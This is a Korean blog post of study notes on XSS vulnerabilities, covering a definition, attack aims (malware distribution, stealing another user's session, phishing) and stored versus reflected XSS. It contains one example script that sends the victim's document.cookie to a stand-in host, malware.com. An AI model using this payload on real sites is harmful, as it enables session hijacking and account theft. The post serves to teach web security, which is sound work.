| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
- vagrant
- 마이데이터
- 백준
- 웹 모의해킹
- 코딩테스트
- docker
- 프로그래머스
- 알고리즘
- 함수
- 데이터 분석
- 머신러닝
- XSS 취약점
- 데이터3법
- 클라우드
- AI
- 회귀분석
- 웹모의해킹
- 개인정보보호법
- 코테
- 코딩테스트 연습
- 도커
- 파이썬 문법
- 시저암호
- 컴퓨터 구조
- 정보보안
- AWS
- 개인정보보호
- 데이터분석
- 자료형
- 파이썬
- Today
- Total
찬란하게
[웹해킹][용어] XSS 취약점 본문
1. XSS 취약점이란?
클라이언트 스크립트를 이용해 사용자에게 특정 행위를 하게 해서 악의적인 목적으로 이용하는 것
2021.05.07 - [정보 보안/웹 해킹] - [웹해킹] OWASP TOP 10_웹 취약점
[웹해킹] OWASP TOP 10_웹 취약점
1. OWASP OWASP(The Open Web Application Security Project)는 오픈소스 웹 애플리케이션 보안 프로젝트이다. 주로 웹에 관한 정보 노출, 악성 파일 및 스크립트, 보안 취약점 등을 연구하며, 10대 웹 애플리케이.
s2cherryy.tistory.com
2017년 Top7, 2013 Top3에 오른 취약점이다!
2. 공격 유형
1) 악성코드 배포
악의적인 스크립트 삽입
2) 다른 사용자의 권한 획득
악의적인 스크립트 삽입
예 : <script>document.write('<img src="http://malware.com/' +document.cookie+'">');</script>
쿠키값 삽입
* 쿠키 : 사용자의 인증이 저장된 data
서버는 세션(인증 정보 저장)을 저장
세션 정보 + 각종 정보 ==> 쿠키값으로 저장
3) 피싱 사이트 유도
3. 공격 기법
1) Stored XSS 취약점 공격 :
게시물, 쪽지 보내기, 주문 페이지 입력 부분에 악의적인 스크립트가 DB에 저장되어 실행되는 공격
2) Refleced XSS :
DB 저장이 되지 않는다.
파라미터 값의 입력 값 미흡으로 상대방에게 링크를 쪽지로 보내거나, 게시물에 링크를 클릭하게 유도하여 악성코드 배포
'정보보안 > 웹 해킹' 카테고리의 다른 글
| [웹해킹] 쇼핑몰 취약점 진단 _ 보고서 작성용_ 수정중 (0) | 2021.05.08 |
|---|---|
| [웹해킹] XSS 취약점_Stored XSS 취약점_비박스 (0) | 2021.05.08 |
| [웹해킹] 쇼핑몰 실습2_ 인증 처리 취약점 확인_인증 관점 (0) | 2021.05.08 |
| [모의해킹] 쇼핑몰 실습1_환경 구성_비박스 (0) | 2021.05.07 |
| [모의해킹/시행착오] VM Ware 문제점_eth0 IPv6 (0) | 2021.05.07 |
